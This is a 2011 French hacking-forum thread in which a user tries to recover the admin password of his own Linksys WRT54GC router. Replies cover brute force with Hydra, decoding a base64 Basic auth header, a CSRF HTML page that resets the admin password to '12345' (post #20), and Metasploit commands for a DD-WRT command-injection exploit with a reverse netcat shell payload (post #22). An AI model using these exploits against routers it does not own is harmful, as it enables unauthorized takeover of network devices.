Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 17-11-2011 17:17:59

Ramses
Membre
Inscription : 17-11-2011
Messages : 24

Récupération MDP de type 7 sur routeur cisco

Bonjours a tous!

Ceci est ma première discussion et j'espère qu'elle sera utile smile

Alors voila: Je possède un routeur wifi linksys WRT54GC et la page de configuration (http://192.168.1.1/) de ce dernier est protégé par un nom d'utilisateur et un mot de pass.

j'ai fais quelque recherche pour savoir si il était possible de cracker ou de passer ce MDP.

Et voila sur quoi je suis tombé: Comment décrypter un mot de passe Cisco de type 7.

Il y a même un script php et diverses commandes ici: scritp cisco type 7

Ma question est la suivante: Où faut-il entré les commandes du style "show running-config"?? Quel logiciel doit-je utiliser?

D'avance merci pour vos réponses big_smile

[source:] www.lepost.fr Edit Noireaude.

A bientôt.

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 17-11-2011 17:33:07

noireaude
Membre d'honneur
Lieu : Chez le docteur
Inscription : 12-03-2010
Messages : 2 362
Site Web

Re : Récupération MDP de type 7 sur routeur cisco

Plop merci pour l'info, je me suis permis d'éditer ton lien, tout étéait bon à un détail, il est toujours sympa de citer "explicitement" la source.
Sauf bien sûr si s'est ton site perso.


L’écureuil conserve les noisettes par instinct et non par représentation, sans cela il aurait déjà bâti des congélateurs à noisettes. Karl Marx : 1818 - 1883

Ma seule certitude est d'être dans le doute. Pierre Desproges : 1939 - 1988  @lavachelibre

Hors Ligne

#3 17-11-2011 17:35:42

Ramses
Membre
Inscription : 17-11-2011
Messages : 24

Re : Récupération MDP de type 7 sur routeur cisco

c'est juste noireaude... merci d'avoir apporté les modifications nécessaire

a l'avenir, je n'y manquerai pas! wink

Hors Ligne

#4 17-11-2011 17:51:09

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : Récupération MDP de type 7 sur routeur cisco

Salut Ramses (comme le pharaon, oui mais lequel ?), bienvenue sur le forum smile

Je ne suis pas sûr, mais à mon avis lesdites commandes doivent être tapées dans une session-console sur le routeur même, probablement via telnet. Tu dois donc entrer la commande "[c]telnet 192.168.1.1[/c]" dans un terminal Linux ou une invite de commande Windows (Démarrer > exécuter > cmd).

Le truc, c'est ue pour ouvrir une session en telnet il faut justement connaître le mot de passe d'accès, donc dans ton cas ça ne va sans doute pas t'avancer big_smile
A mon sens, la meilleure façon de récupérer ce genre de mot de passe c'est par la force brute mais il faut un bon dico. Après, il suffit d'utiliser Hydra pour tester toutes les combinaisons possibles et l'avantage c'est que là tu auras directement le mot de passe en clair sans devoir inverser le protocole de hachage de Cisco smile

Hors Ligne

#5 17-11-2011 18:02:03

spawn
Modérateur
Inscription : 14-01-2011
Messages : 1 006

Re : Récupération MDP de type 7 sur routeur cisco

Essaye d'avoir un accès par ssh, et tapes ces commandes.
(mais pour ca il te faut un accès, et dnoc il faut que tu te sois logué, avec un mot de passe. Sysiphe que tu nous tiens smile)

le cryptage du mot de passe Cisco de type 7, c'est un vieux César !!!! XD MDR XPDTR LOLILOOLOLOLOLOL.
Normal que son nom soit 'WEAK' (=faible en anglais).
ils osent appeler ca un hash ^^


@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Hors Ligne

#6 17-11-2011 18:08:57

Fuji
Membre Irremplaçable
Lieu : Saint Script-sur-Shell
Inscription : 13-12-2010
Messages : 783

Re : Récupération MDP de type 7 sur routeur cisco

Au cas ou tu es sur Windows, il faut savoir que telnet est désactivé par défaut, pour cela tu te rends dans :

Panneau de configuration > Programmes et fonctionnalités > Activer ou désactiver des fonctionnalités Windows ( dans le volet à gauche) et tu coches la case "client telnet"

Tu as tout ce qu'il faut sur les routeurs ici et leurs mdp par défaut --> Exploits & Routeurs

Hors Ligne

#7 17-11-2011 19:09:33

Ramses
Membre
Inscription : 17-11-2011
Messages : 24

Re : Récupération MDP de type 7 sur routeur cisco

Mais quels connaissances! vous m'épaterai toujours... :p

Donc si je comprend bien, il est impossible de récupérer le hash sans le mot de passe?

P.S: Pardon pour le retard, un ami est passé me rendre visite.

Hors Ligne

#8 17-11-2011 19:17:49

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 314

Re : Récupération MDP de type 7 sur routeur cisco

Bonsoir wink

Tu peux observer la réponse http header avec le plugin de firefox "live http header" quand tu rentres un mot de passe (meme si il est faux c'est pas grave) je connais pas la config des cisco mais c'est possible que ça soit encodé en base64 ou en ntml, si par exemple tu vois quelque chose comme ça "authorisation basic" il y a peut-etre moyen de décrypter le pass.

Hors Ligne

#9 17-11-2011 19:26:33

Ramses
Membre
Inscription : 17-11-2011
Messages : 24

Re : Récupération MDP de type 7 sur routeur cisco

Merci koala je viens d'essayé et voila: "Authorization: Basic OmFkbWlu"

tu sais ce que veux dire le "OmFkbWlu" ?

fuji, c'est normal que ça fait passé plus de 15min que la modification s'effectue?

merci pour vos réponse big_smile

Hors Ligne

#10 17-11-2011 19:42:42

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 314

Re : Récupération MDP de type 7 sur routeur cisco

tu sais ce que veux dire le "OmFkbWlu" ?

A ton avis? big_smile relis le post que j'ai ecris la réponse est dedans, pour infos je viens de trouver le mot de passe mais je te laisse chercher un peu, si on peux appeler ça de la recherche car tu as la réponse sous les yeux wink

Hors Ligne

#11 17-11-2011 19:51:55

Ramses
Membre
Inscription : 17-11-2011
Messages : 24

Re : Récupération MDP de type 7 sur routeur cisco

tu veux dire que c'est le hash?

éclaire ma lanterne stp koala hmm

Hors Ligne

#12 17-11-2011 20:00:59

Ramses
Membre
Inscription : 17-11-2011
Messages : 24

Re : Récupération MDP de type 7 sur routeur cisco

haaan oui ok c'est pcq il est crypter en base64 bien vu :p

le seul problème est que j'ai essayé avec un faux mot de passe :p donc ce n'est pas celui la...

une autre idée koala?

Hors Ligne

#13 17-11-2011 20:10:46

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 314

Re : Récupération MDP de type 7 sur routeur cisco

Oui, maintenant que tu sais comment c'est crypter tu peux utiliser medusa ou hydra comme la suggérer Antares mais il va falloir que tu précises que c'est du base64, regardes dans la doc du tool que tu veux utiliser wink

Hors Ligne

#14 17-11-2011 20:44:47

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : Récupération MDP de type 7 sur routeur cisco

tu peux utiliser medusa ou hydra comme la suggérer Antares mais il va falloir que tu précises que c'est du base64

Pas vraiment, l'utilisateur n'est pas sensé connaître le mot de passe haché, donc ce que Hydra (ou Medusa) va tester ce sont des mots de passe en clair. Une fois qu'il en a trouvé un qui est accepté par le routeur il le signalera à l'utilisateur, c'est pour ça que je disais que ça donnait directement accès au password.

Évidemment l'inconvénient c'est que ça oblige à avoir un dictionnaire qui contient le bon mot de passe, ou à en créer un complet mais là ça risque de prendre un bout de temps à bruteforcer hmm

Hors Ligne

#15 17-11-2011 20:48:18

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 314

Re : Récupération MDP de type 7 sur routeur cisco

Pas vraiment, l'utilisateur n'est pas sensé connaître le mot de passe haché, donc ce que Hydra (ou Medusa) va tester ce sont des mots de passe en clair. Une fois qu'il en a trouvé un qui est accepté par le routeur il le signalera à l'utilisateur, c'est pour ça que je disais que ça donnait directement accès au password.

Corrigé par le master smile c'est sur que ça risque de lui prendre du temps hmm

Hors Ligne

#16 18-11-2011 01:07:25

Ramses
Membre
Inscription : 17-11-2011
Messages : 24

Re : Récupération MDP de type 7 sur routeur cisco

Ah oui quand même... je pensais pas que ca prendrai cette ampleur XD

Bon, en résumé, seul un brut force et une attaque par dico pourrai faire sauter ce mot de passe?

N'y a-t-il pas une façon de faire bugger le routeur pour le forcer à reset?

Ou encore, un logiciel qui me permettrai d'obtenir le hash de type 7 sans le mot de passe?

J'ai entendu parlé de "hyper-terminal", ça vous dis quelque chose?

Hors Ligne

#17 18-11-2011 11:13:52

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : Récupération MDP de type 7 sur routeur cisco

Ramses a écrit :

N'y a-t-il pas une façon de faire bugger le routeur pour le forcer à reset?
Ou encore, un logiciel qui me permettrai d'obtenir le hash de type 7 sans le mot de passe?

Pour ça il faudrait qu'il y ai une faille dans le système du routeur qui le permette. Je n'en connais pas sur ce modèle, tout ce que j'ai trouvé c'est de quoi le faire planter (buffer overflow) ou de quoi changer le mot de passe admin sans connaître le vrai (mais ça ne te permet pas de récupérer le mot de passe actuel).
Plus de détails ici --> Linksys WRT54GC Password Changer
(encore faut-il que ton firmware n'ait pas été mis à jour pour qu'il soit vulnérable)

J'ai entendu parlé de "hyper-terminal", ça vous dis quelque chose?

l'Hyperterminal de Windows est juste une console qui te permet d'ouvrir une liaison série (RS-232), Telnet ou équivalent. Non seulement tu auras besoin du mot de passe pour ouvrir une session en HT, mais en plus il faudra savoir quelles commandes tu dois taper après. Dans le cas présent je ne suis pas sûr que ça t'aide beaucoup wink

Hors Ligne

#18 18-11-2011 14:32:28

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 354

Re : Récupération MDP de type 7 sur routeur cisco

Fuji t'a donné le lien d'un topic intéressant dans lequel figure un lien vers le site Routerpwn. On n'y trouve pas d'exploit spécifique au WRT54GC mais il y a pas mal de choses qui concernent le WRT54G qui mériteraient peut etre d'etre testées, on ne sait jamais: Routerpwn Cisco Linksys WRT54G, WAG120N.

Hors Ligne

#19 19-11-2011 17:27:24

Ramses
Membre
Inscription : 17-11-2011
Messages : 24

Re : Récupération MDP de type 7 sur routeur cisco

Tout d'abord, un grand merci a tous de me répondre aussi rapidement et de prendre mon problème au serieux! big_smile

j'ai essayé toutes les solution que vous m'avez donner (hélas sans résultat) a l'exception de l'attaque dico et brut force (trop longue),
et du script java donné par antares.

Antares, pourrai tu me dire comment utiliser ce script? il me semble que c'est du HTML et du Java (mais bon tu le sais déjà :p)

Merci encore a tout le monde!

Hors Ligne

#20 19-11-2011 17:37:04

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : Récupération MDP de type 7 sur routeur cisco

Je pense qu'il suffit de copier-coller le code suivant dans un fichier HTML et d'ouvrir ce fichier avec le navigateur :

<html><body>
<form method="POST" action="http://192.168.1.1:8080/administration.cgi" name="senha" ENCTYPE="multipart/form-data">
<INPUT type="hidden" name="sysPasswd" value="12345" maxLength=20 size=21>
<INPUT type="hidden" name="sysConfirmPasswd" value="12345" maxLength=20 size=21>
</form>

<SCRIPT language="JavaScript">
  document.senha.submit();
</SCRIPT>

</body></html>

Après ça le mot de passe admin devrait être "12345".

Je n'ai pas pu tester, vu que je n'ai pas de routeur de ce type à disposition. Et puis comme je te l'ai dit, il est possile que le système de ton WRT54GC ait déjà été patché pour éviter cette faille wink

Hors Ligne

#21 19-11-2011 18:01:57

Ramses
Membre
Inscription : 17-11-2011
Messages : 24

Re : Récupération MDP de type 7 sur routeur cisco

Voila je vien d'essayé antares.

et visiblement mon routeur est patché hmm (erreur de chargement de la page)

Pourtant, dans la barre d'adresse, il y avais le chemin du fichier HTML,

puis c'est devenu ca: http://192.168.1.1:8080/administration.cgi

Mais bon, ça ne veux rien dire je suppose...

Et le mot de passe reste inchangé...

on commence a être a court de solution! :p

Hors Ligne

#22 20-11-2011 04:42:14

Fuji
Membre Irremplaçable
Lieu : Saint Script-sur-Shell
Inscription : 13-12-2010
Messages : 783

Re : Récupération MDP de type 7 sur routeur cisco

Le framework metasploit met à disposition un exploit permettant d'exploiter le firmware "DD-WRT" :

use exploit/linux/http/ddwrt_cgibin_exec  <-- l'Exploit à utiliser.
set PAYLOAD cmd/unix/reverse_netcat       <-- Le payload à envoyer, il y a aussi le "bind_netcat" et "generic"
set RHOST                                 <-- L'adresse cible, donc: 192.168.1.1 
set RPORT                                 <-- Le port cible: 80
set LHOST                                 <-- l'adresse de ton ordi.

Description:
  This module abuses a metacharacter injection vulnerability in the 
  HTTP management server of wireless gateways running DD-WRT. This 
  flaw allows an unauthenticated attacker to execute arbitrary 
  commands as the root user account.

Comme Antares, j'ai pas de routeur sous la main et aussi qu'il soit déjà été patché contre cette faille wink

Si tu n'es pas initié à metasploit et au pentest en général, ne te prends pas trop la tète, laisse tomber. Sinon 
tu convoques Imhotep qui a déjà réussi un autre exploit: la construction de la pyramide smile

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Discussion Réponses Vues Dernier message
9 1700 20-11-2016 03:45:46 par richie
Routeur avec antenne amovible par le flibustier
0 228 07-11-2016 19:12:24 par le flibustier
Configuration AP Cisco par Vincent_vb
0 257 04-11-2016 21:56:36 par Vincent_vb
3 425 31-08-2016 20:12:36 par M1ck3y
0 362 18-08-2016 14:32:21 par paskalfari

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.03 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]